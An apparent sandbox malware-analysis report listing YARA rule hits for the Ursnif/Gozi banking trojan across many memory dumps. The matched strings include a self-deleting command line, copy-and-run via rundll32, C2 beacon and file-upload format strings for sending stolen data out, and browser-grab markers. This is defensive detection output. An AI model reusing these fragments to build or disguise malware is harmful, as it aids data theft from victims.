0x3c10:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x5d4:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x614:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xa06:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x687:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x750:$a6: http://constitution.org/usdeclar.txt 0x8d5:$a7: grabs= 0xf32:$a8: CHROME.DLL 0x724:$a9: Software\AppDataLow\Software\Microsoft\ 0x37f0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3848:$a9: Software\AppDataLow\Software\Microsoft\ 0x38a8:$a9: Software\AppDataLow\Software\Microsoft\ 0x3908:$a9: Software\AppDataLow\Software\Microsoft\ 0x3968:$a9: Software\AppDataLow\Software\Microsoft\
00000058.00000003.814825751.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000058.00000003.814825751.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x86c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x8ac:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xcf2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x91f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x9f5:$a6: http://constitution.org/usdeclar.txt 0xb7a:$a7: grabs= 0x104c:$a8: CHROME.DLL 0x9c9:$a9: Software\AppDataLow\Software\Microsoft\ 0x3a90:$a9: Software\AppDataLow\Software\Microsoft\ 0x3af0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3b50:$a9: Software\AppDataLow\Software\Microsoft\ 0x3bb0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3c10:$a9: Software\AppDataLow\Software\Microsoft\
00000058.00000003.803878408.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000058.00000003.803878408.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x86c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x8ac:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xcf2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x91f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x9f5:$a6: http://constitution.org/usdeclar.txt 0xb7a:$a7: grabs= 0x104c:$a8: CHROME.DLL 0x9c9:$a9: Software\AppDataLow\Software\Microsoft\ 0x3a90:$a9: Software\AppDataLow\Software\Microsoft\ 0x3af0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3b50:$a9: Software\AppDataLow\Software\Microsoft\ 0x3bb0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3c10:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.493910135.000000000111D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000043.00000000.771438221.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000023.00000003.683117141.0000000003558000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000023.00000003.683117141.0000000003558000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x5d4:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x614:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xa06:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x687:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x750:$a6: http://constitution.org/usdeclar.txt 0x8d5:$a7: grabs= 0xf32:$a8: CHROME.DLL 0x724:$a9: Software\AppDataLow\Software\Microsoft\ 0x37f0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3848:$a9: Software\AppDataLow\Software\Microsoft\ 0x38a8:$a9: Software\AppDataLow\Software\Microsoft\ 0x3908:$a9: Software\AppDataLow\Software\Microsoft\ 0x3968:$a9: Software\AppDataLow\Software\Microsoft\
0000001F.00000000.667603922.000001489BB00000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.389654961.000000000111C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x86c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x8ac:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xcf2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x91f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x9f5:$a6: http://constitution.org/usdeclar.txt 0xb7a:$a7: grabs= 0x104c:$a8: CHROME.DLL 0x9c9:$a9: Software\AppDataLow\Software\Microsoft\ 0x3a90:$a9: Software\AppDataLow\Software\Microsoft\ 0x3af0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3b50:$a9: Software\AppDataLow\Software\Microsoft\ 0x3bb0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3c10:$a9: Software\AppDataLow\Software\Microsoft\
0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x86c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x8ac:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xcf2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x91f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x9f5:$a6: http://constitution.org/usdeclar.txt 0xb7a:$a7: grabs= 0x104c:$a8: CHROME.DLL 0x9c9:$a9: Software\AppDataLow\Software\Microsoft\
0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x86c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x8ac:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xcf2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x91f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x9f5:$a6: http://constitution.org/usdeclar.txt 0xb7a:$a7: grabs= 0x104c:$a8: CHROME.DLL 0x9c9:$a9: Software\AppDataLow\Software\Microsoft\ 0x3a90:$a9: Software\AppDataLow\Software\Microsoft\ 0x3af0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3b50:$a9: Software\AppDataLow\Software\Microsoft\ 0x3bb0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3c10:$a9: Software\AppDataLow\Software\Microsoft\
00000059.00000002.827171942.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000059.00000002.827171942.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x86c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x8ac:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xcf2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x91f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x9f5:$a6: http://constitution.org/usdeclar.txt 0xb7a:$a7: grabs= 0x104c:$a8: CHROME.DLL 0x9c9:$a9: Software\AppDataLow\Software\Microsoft\ 0x3a90:$a9: Software\AppDataLow\Software\Microsoft\ 0x3af0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3b50:$a9: Software\AppDataLow\Software\Microsoft\ 0x3bb0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3c10:$a9: Software\AppDataLow\Software\Microsoft\
00000043.00000000.769688179.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.390766199.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000023.00000003.683052464.0000000003558000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000023.00000003.683052464.0000000003558000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x5d4:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x614:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xa06:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x687:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x750:$a6: http://constitution.org/usdeclar.txt 0x8d5:$a7: grabs= 0xf32:$a8: CHROME.DLL 0x724:$a9: Software\AppDataLow\Software\Microsoft\ 0x37f0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3848:$a9: Software\AppDataLow\Software\Microsoft\ 0x38a8:$a9: Software\AppDataLow\Software\Microsoft\ 0x3908:$a9: Software\AppDataLow\Software\Microsoft\ 0x3968:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.389500778.000000000119B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000029.00000000.703497252.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0000003E.00000000.763965956.0000019933F90000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0000003E.00000003.767821170.000001993459C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000003E.00000003.767821170.000001993459C000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x86c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x8ac:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xcf2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x91f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x9f5:$a6: http://constitution.org/usdeclar.txt 0xb7a:$a7: grabs= 0x104c:$a8: CHROME.DLL 0x9c9:$a9: Software\AppDataLow\Software\Microsoft\ 0x3a90:$a9: Software\AppDataLow\Software\Microsoft\ 0x3af0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3b50:$a9: Software\AppDataLow\Software\Microsoft\ 0x3bb0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3c10:$a9: Software\AppDataLow\Software\Microsoft\
00000013.00000000.596069262.000002240CA50000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000029.00000000.704474059.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0000003E.00000000.762259112.0000019933F90000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000023.00000000.681894423.0000000003020000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000059.00000000.816576347.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000023.00000003.682539634.0000000003558000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000023.00000003.682539634.0000000003558000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x5d4:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x614:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xa06:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x687:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x750:$a6: http://constitution.org/usdeclar.txt 0x8d5:$a7: grabs= 0xf32:$a8: CHROME.DLL 0x724:$a9: Software\AppDataLow\Software\Microsoft\ 0x37f0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3848:$a9: Software\AppDataLow\Software\Microsoft\ 0x38a8:$a9: Software\AppDataLow\Software\Microsoft\ 0x3908:$a9: Software\AppDataLow\Software\Microsoft\ 0x3968:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
0000003E.00000000.760746671.0000019933F90000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.495743811.0000000000D29000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000023.00000003.682736014.0000000003558000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000023.00000003.682736014.0000000003558000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x5d4:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x614:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xa06:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x687:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x750:$a6: http://constitution.org/usdeclar.txt 0x8d5:$a7: grabs= 0xf32:$a8: CHROME.DLL 0x724:$a9: Software\AppDataLow\Software\Microsoft\ 0x37f0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3848:$a9: Software\AppDataLow\Software\Microsoft\ 0x38a8:$a9: Software\AppDataLow\Software\Microsoft\ 0x3908:$a9: Software\AppDataLow\Software\Microsoft\ 0x3968:$a9: Software\AppDataLow\Software\Microsoft\
00000029.00000000.702640862.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000059.00000000.818431890.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x86c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x8ac:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xcf2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x91f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x9f5:$a6: http://constitution.org/usdeclar.txt 0xb7a:$a7: grabs= 0x9c9:$a9: Software\AppDataLow\Software\Microsoft\
00000043.00000002.778497815.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000043.00000002.778497815.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x86c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x8ac:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xcf2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x91f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x9f5:$a6: http://constitution.org/usdeclar.txt 0xb7a:$a7: grabs= 0x104c:$a8: CHROME.DLL 0x9c9:$a9: Software\AppDataLow\Software\Microsoft\ 0x3a90:$a9: Software\AppDataLow\Software\Microsoft\ 0x3af0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3b50:$a9: Software\AppDataLow\Software\Microsoft\ 0x3bb0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3c10:$a9: Software\AppDataLow\Software\Microsoft\
00000058.00000003.814713525.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000058.00000003.814713525.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x86c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x8ac:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xcf2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x91f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x9f5:$a6: http://constitution.org/usdeclar.txt 0xb7a:$a7: grabs= 0x104c:$a8: CHROME.DLL 0x9c9:$a9: Software\AppDataLow\Software\Microsoft\ 0x3a90:$a9: Software\AppDataLow\Software\Microsoft\ 0x3af0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3b50:$a9: Software\AppDataLow\Software\Microsoft\ 0x3bb0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3c10:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.390744160.000000000119B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x6c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0xac:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x4f2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x11f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x1f5:$a6: http://constitution.org/usdeclar.txt 0x37a:$a7: grabs= 0x84c:$a8: CHROME.DLL 0x1c9:$a9: Software\AppDataLow\Software\Microsoft\
00000059.00000000.820005242.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000059.00000003.822550991.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
